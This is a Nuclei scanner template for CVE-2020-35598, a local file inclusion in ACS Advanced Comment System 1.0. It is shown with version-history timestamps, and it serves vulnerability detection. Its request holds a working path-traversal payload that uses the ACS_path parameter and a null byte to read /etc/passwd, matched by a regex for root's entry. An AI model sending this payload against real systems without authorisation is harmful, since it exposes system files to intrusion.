nuclei-templates/cves/2020/CVE-2020-35598.yaml

36 lines
1004 B
YAML
Raw Normal View History

2021-07-31 23:40:11 +00:00
id: CVE-2020-35598
info:
name: Advanced Comment System 1.0 - Local File Inclusion
2021-07-31 23:40:11 +00:00
author: daffainfo
severity: high
description: ACS Advanced Comment System 1.0 is affected by local file inclusion via an advanced_component_system/index.php?ACS_path=..%2f URI.
reference:
2021-07-31 23:40:11 +00:00
- https://www.exploit-db.com/exploits/49343
2022-06-28 22:27:36 +00:00
- https://seclists.org/fulldisclosure/2020/Dec/13
- https://nvd.nist.gov/vuln/detail/CVE-2020-35598
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-35598
cwe-id: CWE-22
2022-07-02 11:34:19 +00:00
tags: cve,cve2020,lfi,acs
2021-07-31 23:40:11 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
2021-07-31 23:40:11 +00:00
- type: status
status:
- 200
# Enhanced by mp on 2022/06/28